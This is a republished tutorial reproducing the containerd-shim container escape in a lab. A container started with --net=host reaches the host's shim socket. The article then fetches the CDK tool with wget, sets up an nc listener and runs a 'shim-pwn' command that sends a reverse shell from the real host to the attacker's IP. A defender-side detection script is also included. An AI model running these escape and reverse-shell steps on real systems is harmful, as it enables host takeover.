2025-03-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains "Docker container escape vulnerability case analysis"; interested readers may wish to take a look. The method described here is simple, fast and practical, so let's walk through the "Docker container escape vulnerability case analysis" together.
I. Introduction to the vulnerability
Vulnerability principle
Containerd is a daemon that controls runC, providing a command-line client and an API for managing containers on a machine. When Docker is started with the --net=host parameter so that the container shares the net namespace with the host, an attacker inside the container can bypass access control and reach containerd's control API, resulting in privilege escalation and therefore a Docker container escape.
Containerd is an industry-standard container runtime that can run as a daemon on Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API was incorrectly exposed to containers using the host network. Access control on the shim API socket verifies that the effective UID of the connecting process is 0, but does not otherwise restrict access to the abstract Unix domain socket. This allows a malicious container running in the same network namespace as the shim (with an effective UID of 0 but otherwise reduced privileges) to cause new processes to be run with elevated privileges.
Affected versions
Containerd < 1.4.3
Containerd < 1.3.9
Experimental environment:
Victim machine (ubuntu) ip: 192.168.163.129
Victim machine containerd version: 1.2.6
Attacker machine (kali) ip: 192.168.163.131
POC download: https://github.com/Xyntax/CDK/releases/tag/0.1.6
II. Environment introduction
01
Check the docker version on the victim machine; it shows Containerd Version: 1.2.6
Command: docker version
02
To tell the victim machine's real environment apart from its docker environment, create different files under /root in each.
Victim machine's docker environment: there are no files under /root inside the container, so for ease of distinction a dockerfile file is copied into /root.
Victim machine's real environment: a file named true is placed under /root.
III. Reproduction of the vulnerability
01
List the victim machine's containers from its real environment.
Command: docker ps
02
On the victim machine, start a container that shares the host network and enter the docker container directly.
Run a container with --net=host as the startup parameter (for convenience the existing image vulhub/activemq:5.11.1 is reused here; a separate container is created from it without pulling the image again, and the two containers are unrelated).
Command: docker run -it --net=host vulhub/activemq:5.11.1 /bin/bash
03
List the victim machine's containers again from the real environment. The container just created has container id 4ad4f620e6a5.
Command: docker ps
04
Run the following command inside the victim machine's docker container; the abstract-namespace Unix domain socket is visible.
Command: cat /proc/net/unix | grep -a "containerd-shim"
Principle note: in the containerd -> containerd-shim -> runc communication model, the containerd-shim interface is exposed as an abstract unix socket. When docker is started with the --net=host parameter and shares the net namespace with the host, this unix socket can be reached from inside the container. Through this socket, an attacker in the container can drive the downstream runc process to start a new malicious image and escape through it.
05
For ease of viewing, the victim machine switches to the /tmp directory inside the docker environment. Download the corresponding poc and extract it.
Download the poc: wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
Extract the poc: tar -zxvf cdk_v0.1.6_release.tar.gz
06
The Kali attacker machine listens on port 12345.
Command: nc -lvp 12345
07
In the victim machine's docker environment, run the poc to establish the connection.
Command: ./cdk_linux_386 run shim-pwn 192.168.163.131 12345
08
The Kali attacker machine receives a reverse shell from the victim machine's real environment (the files in the /root directory show that the shell belongs to the real host).
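As an added defender-side check (not part of the original article or of the CDK tool), the following POSIX shell script tests the two conditions the steps above rely on: a containerd-shim abstract socket visible in /proc/net/unix from the container's net namespace, and a containerd version below the fixed releases. The sample /proc/net/unix lines are constructed (the shortened container id path is made up for illustration); list_host_network_containers assumes the docker CLI is installed.

```shell
#!/bin/sh
# Added example: check for the two conditions that make the shim escape possible.
# 1) a containerd-shim abstract Unix socket reachable from the container's
#    net namespace (visible in /proc/net/unix), and
# 2) a containerd version below the fixed releases (1.3.9 / 1.4.3).

# Constructed sample in /proc/net/unix format (not captured from a real host);
# the shortened container id in the socket path is illustrative only.
SAMPLE_UNIX='Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000003 00000000 00000000 0001 03 12345 /run/containerd/containerd.sock
0000000000000000: 00000002 00000000 00010000 0001 01 12346 @/containerd-shim/moby/4ad4f620e6a5/shim.sock@
0000000000000000: 00000002 00000000 00010000 0001 01 12347 @/tmp/.X11-unix/X0'

# Print the abstract (@-prefixed) containerd-shim socket names in the given
# /proc/net/unix text. Seen from inside a container, any hit means a shim
# API socket is reachable, which is exactly what --net=host exposes.
find_exposed_shim_sockets() {
    printf '%s\n' "$1" | awk '$NF ~ /^@.*containerd-shim/ { print $NF }'
}

# Succeed (exit 0) if an X.Y.Z containerd version is below the fixed release
# of its branch: 1.4.x fixed in 1.4.3, 1.3.x fixed in 1.3.9, older 1.x unfixed.
containerd_is_vulnerable() {
    ver=$1
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$major" -eq 1 ] || return 1
    case "$minor" in
        4) [ "$patch" -lt 3 ] ;;
        3) [ "$patch" -lt 9 ] ;;
        *) [ "$minor" -lt 3 ] ;;
    esac
}

# Assumes the docker CLI: list running containers whose NetworkMode is host,
# i.e. the ones that share the host net namespace like the article's container.
list_host_network_containers() {
    docker ps -q | xargs -r docker inspect -f '{{.Name}} {{.HostConfig.NetworkMode}}' \
        | awk '$2 == "host" { print $1 }'
}

# Run the socket check against the live /proc/net/unix when it is readable;
# an empty result from inside a container is the expected, safe outcome.
if [ -r /proc/net/unix ]; then
    find_exposed_shim_sockets "$(cat /proc/net/unix)"
fi
```

Run inside a container to confirm no shim socket is reachable, and on the host to find containers started with --net=host and to confirm the containerd version reported by docker version is at or above 1.3.9 / 1.4.3.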
Note:
There are many points to pay attention to in this experiment (limited to the pitfalls I ran into during my own experiment):
1. I originally intended to use vulhub's S2-032 environment and escape from docker via remote command execution with Struts2 tools. It turned out that the abstract-namespace Unix domain socket could not be seen when running the command cat /proc/net/unix | grep -a "containerd-shim", and "Cannot find vulnerable socket" was displayed when running the poc (I used the docker environment entered with docker exec -it 6970bdddacc6 /bin/bash).
2. Note that when you create a new container with --net=host, the image name is the same. Pay attention to the distinction, otherwise the executed command will enter the other container.
3. This exploitation condition assumes the victim machine's docker container is already fully controlled; the victim machine's real environment is then taken over from that docker environment.
At this point, I believe everyone has a deeper understanding of the "Docker container escape vulnerability case analysis"; you may as well try it out in practice.